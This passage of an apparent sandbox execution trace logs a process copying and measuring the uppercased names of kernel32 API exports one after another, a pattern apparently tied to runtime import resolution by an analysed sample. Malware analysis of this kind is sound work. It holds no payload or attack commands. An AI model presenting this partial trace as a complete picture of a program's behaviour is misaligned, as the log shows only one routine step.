(lpString="ADDATOMW") returned 8 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.369] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.369] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.369] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.369] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.369] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.369] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.369] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.369] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.369] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.369] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.369] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.369] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.369] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.369] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.369] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.370] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.370] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.370] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.370] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.370] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.370] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.370] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.370] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.370] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.370] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.370] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.370] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.370] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.370] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.370] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.370] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.370] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.370] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.370] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.371] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.371] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.371] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.371] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.371] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.371] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.371] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.371] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.371] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.371] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.371] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.371] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.371] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.371] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.371] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.371] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.371] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.371] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.371] lstrlenA (lpString="BEEP") returned 4 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.372] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.372] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.372] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.372] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.372] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.372] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.372] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.372] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.372] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.372] lstrlenA (lpString="CANCELIO") returned 8 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.372] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.372] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.372] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.372] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.372] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.372] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.372] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.373] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.373] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.373] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.373] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.373] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.373] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.373] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.373] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.373] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.373] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.373] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.373] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.373] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.373] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.373] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.373] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.374] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.374] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.374] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.374] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.374] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.374] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.374] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.374] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.374] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.374] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.374] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.374] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.374] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.374] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.374] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.374] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.374] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.374] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.374] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.375] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.375] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.375] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.375] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.375] lstrlenA (lpString="COPYFILEA") returned 9 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.375] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.375] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.375] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.375] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.375] lstrlenA (lpString="COPYFILEW") returned 9 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.375] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.375] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.375] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.375] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.375] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.375] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.375] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.375] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.375] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.376] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, 